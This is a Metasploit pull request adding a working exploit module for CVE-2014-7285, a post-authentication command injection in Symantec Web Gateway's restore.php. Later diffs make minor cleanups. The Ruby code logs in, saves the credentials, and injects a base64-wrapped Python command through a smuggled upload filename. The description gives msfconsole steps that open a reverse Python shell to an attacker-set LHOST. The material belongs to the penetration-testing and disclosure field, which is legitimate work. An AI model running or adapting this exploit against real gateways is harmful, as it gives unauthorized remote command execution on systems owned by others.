### PR TITLE
Add CVE-2014-7285, Symantec Web Gateway restore.php Command Injection

### DIFF
--- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb
@@ -1,0 +1,255 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
+      'Description'    => %q{
+          This module exploits a command injection vulnerability found in Symantec Web
+        Gateway's setting restoration feature. The filename portion can be used to inject
+        system commands into a syscall function, and gain control under the context of
+        HTTP service.
+
+        For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
+        However, for version 5.2.1, you must be an administrator.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Egidio Romano', # Original discovery & assist of MSF module
+          'sinn3r'
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-7285' ],
+          [ 'OSVDB', '116009' ],
+          [ 'BID', '71620' ],
+          [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
+          [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
+        ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic python'
+            }
+        },
+      'DefaultOptions' => {
+        'RPORT'      => 443,
+        'SSL'        => true,
+        'SSLVersion' => 'TLS1'
+      },
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Symantec Web Gateway 5.0', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password for the username'])
+      ], self.class)
+  end
+
+  def protocol
+    ssl ? 'https' : 'http'
+  end
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})
+
+    if res && res.body =~ /Symantec Web Gateway/
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def get_sid
+    sid = ''
+
+    uri = target_uri.path
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'spywall/login.php'),
+      'method' => 'GET',
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
+    end
+
+    cookies = res.get_cookies
+    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
+
+    sid
+  end
+
+  def login(sid)
+    uri = target_uri.path
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'spywall/login.php'),
+      'method' => 'POST',
+      'cookie' => sid,
+      'headers' => {
+        'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
+      },
+      'vars_post' => {
+        'USERNAME' => datastore['USERNAME'],
+        'PASSWORD' => datastore['PASSWORD'],
+        'loginBtn' => 'Login'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
+    end
+
+    cookies = res.get_cookies
+    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
+
+    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
+      # Successful login
+      return sid
+    else
+      # Failed login
+      fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+    end
+  end
+
+  def build_payload
+    # At of today (Feb 27 2015), there are only three payloads this module will support:
+    # * cmd/unix/generic
+    # * cmd/unix/reverse_python
+    # * cmd/unix/reverse_python_ssl
+    p = payload.encoded
+
+    case current_payload_name
+    when /cmd\/unix\/generic/
+      # Filter that out one, Mr. basename()
+      p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
+      p = "python -c \"exec('#{p}'.decode('base64'))\""
+    else
+      p = p.gsub(/python -c "exec/, 'python -c \\"exec')
+      p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
+    end
+
+    p
+  end
+
+  def build_mime
+    p = build_payload
+
+    data = Rex::MIME::Message.new
+    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
+    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
+    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
+    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
+    data.add_part('', nil, nil, 'form-data; name="restore"')
+    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
+    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
+    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
+    data.add_part('0', nil, nil, 'form-data; name="max_events"')
+    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
+    data.add_part('', nil, nil, 'form-data; name="testaddress"')
+    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
+    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
+    data.add_part('', nil, nil, 'form-data; name="capture_filter"')
+
+    data
+  end
+
+  def inject_exec(sid)
+    uri = target_uri.path
+    mime = build_mime # Payload inside
+    send_request_cgi({
+      'uri'     => normalize_uri(uri, 'spywall/restore.php'),
+      'method'  => 'POST',
+      'cookie'  => sid,
+      'data'    => mime.to_s,
+      'ctype'   => "multipart/form-data; boundary=#{mime.bound}",
+      'headers' => {
+        'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
+      }
+    })
+  end
+
+  def save_cred(username, password)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: protocol,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def current_payload_name
+    # pinst is a protected method so modules should not access it like this.
+    # But command injection is a sort of unfriendly because the vulnerable PHP file filters out our
+    # input with a basename() function. So for example if you do cat /etc/passwd > /tmp/data.txt,
+    # your command won't work. To get around that, we need to Base64 the command, and let Python do
+    # the work. But to do this, I have to know the user is actually using the cmd/unix/generic or not.
+    # One of the downsides I am aware is that if this payload's fullname is changed due to whatever
+    # reason, the support can break (but the user still at least should be able to use the reverse
+    # python shell).
+    payload.send(:pinst).fullname
+  end
+
+  def exploit
+    print_status("Getting the PHPSESSID...")
+    sid = get_sid
+    if sid.blank?
+      print_error("Failed to get the session ID. Cannot continue with the login.")
+      return
+    end
+
+    print_status("Attempting to login as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+    sid = login(sid)
+    if sid.blank?
+      print_error("Failed to get the session ID from the login process. Cannot continue with the injection")
+      return
+    else
+      # Good password, keep it
+      save_cred(datastore['USERNAME'], datastore['PASSWORD'])
+    end
+
+    print_status("Trying restore.php...")
+    inject_exec(sid)
+  end
+
+end

--- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected
     end
 
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def get_sid
@@ -226,10 +226,10 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    print_status("Attempting to login as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
     sid = login(sid)
     if sid.blank?
-      print_error("Failed to get the session ID from the login process. Cannot continue with the injection")
+      print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
       return
     else
       # Good password, keep it

--- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # * cmd/unix/reverse_python_ssl
     p = payload.encoded
 
-    case current_payload_name
+    case datastore['PAYLOAD']
     when /cmd\/unix\/generic/
       # Filter that one out, Mr. basename()
       p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
@@ -216,18 +216,6 @@ class Metasploit3 < Msf::Exploit::Remote
     }.merge(service_data)
 
     create_credential_login(login_data)
-  end
-
-  def current_payload_name
-    # pinst is a protected method so modules should not access it like this.
-    # But command injection is sort of unfriendly because the vulnerable PHP file filters out our
-    # input with a basename() function. So for example if you do cat /etc/passwd > /tmp/data.txt,
-    # your command won't work. To get around that, we need to Base64 the command, and let Python do
-    # the work. But to do this, I have to know if the user is actually using the cmd/unix/generic or not.
-    # One of the downsides I am aware of is that if this payload's fullname is changed due to whatever
-    # reason, the support can break (but the user still at least should be able to use the reverse
-    # python shell).
-    payload.send(:pinst).fullname
   end
 
   def exploit

--- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Targets'        =>
         [
-          ['Symantec Web Gateway 5.0', {}]
+          ['Symantec Web Gateway 5', {}]
         ],
       'Privileged'     => false,
       'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     case current_payload_name
     when /cmd\/unix\/generic/
-      # Filter that out one, Mr. basename()
+      # Filter that one out, Mr. basename()
       p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
       p = "python -c \"exec('#{p}'.decode('base64'))\""
     else

--- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
     uri = target_uri.path
     res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})
 
-    if res && res.body =~ /Symantec Web Gateway/
+    if res && res.body.include?('Symantec Web Gateway')
       return Exploit::CheckCode::Detected
     end
 

--- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb
@@ -220,11 +220,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def current_payload_name
     # pinst is a protected method so modules should not access it like this.
-    # But command injection is a sort of unfriendly because the vulnerable PHP file filters out our
+    # But command injection is sort of unfriendly because the vulnerable PHP file filters out our
     # input with a basename() function. So for example if you do cat /etc/passwd > /tmp/data.txt,
     # your command won't work. To get around that, we need to Base64 the command, and let Python do
-    # the work. But to do this, I have to know the user is actually using the cmd/unix/generic or not.
-    # One of the downsides I am aware is that if this payload's fullname is changed due to whatever
+    # the work. But to do this, I have to know if the user is actually using the cmd/unix/generic or not.
+    # One of the downsides I am aware of is that if this payload's fullname is changed due to whatever
     # reason, the support can break (but the user still at least should be able to use the reverse
     # python shell).
     payload.send(:pinst).fullname


### PR DESCRIPTION
This module exploits a vulnerability in Symantec Web Gateway found by Egidio Romano. You can find his advisory here: http://karmainsecurity.com/KIS-2014-19
## Prepare for the setup

To prepare for testing, you must have the vulnerable version of Symantec Web Gateway such as 5.1.1. Symantec no longer provides this version publicly (the one currently hosted is 5.2.2, the patched one). So you either already have the vulnerable version in order to test this pull request, or you download 5.2.2 anyway and make it vulnerable (but this is assuming you somehow have the vulnerable files).

Or you can find me in person and you can try my test box.
## Testing
- [x] Do: `./msfconsole -q -x "use exploit/linux/http/symantec_web_gateway_restore; set payload cmd/unix/reverse_python; set lhost [YOUR IP]; run"` (make sure you change the lhost)
- [x] You should get a shell. Like this:

![screen shot 2015-02-27 at 12 39 35 pm](https://cloud.githubusercontent.com/assets/1170914/6418846/df3b7b88-be7d-11e4-9f69-d0c307348d00.png)

For the cmd/unix/generic testing, you don't get an output but the command should work. One way to verify this is:
- [x] Do: `set payload cmd/unix/generic`
- [x] Do: `set lhost [IP]`
- [x] Do: `set cmd id > /tmp/myid.txt`
- [x] Do: `run`
- [x] Use `cmd/unix/reverse_python` to get a shell again
- [x] Do: `cat /tmp/myid.txt`
- [x] You should see the ID output. Like the following example:

![screen shot 2015-02-27 at 12 43 37 pm](https://cloud.githubusercontent.com/assets/1170914/6418975/ee5b6bae-be7e-11e4-95be-582dbeae8adc.png)
